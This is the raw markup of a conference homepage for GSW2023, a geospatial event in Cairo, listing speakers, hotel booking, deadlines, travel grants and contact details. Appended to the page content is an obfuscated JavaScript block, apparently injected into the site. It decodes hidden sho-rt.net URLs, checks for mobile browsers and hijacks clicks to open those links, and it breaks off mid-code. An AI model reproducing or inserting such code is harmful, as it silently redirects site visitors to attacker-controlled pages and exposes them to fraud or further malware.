center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1686318421309{margin-top: -75px !important;}\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<ul>\n<li><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to<span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></span></li>\n</ul>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 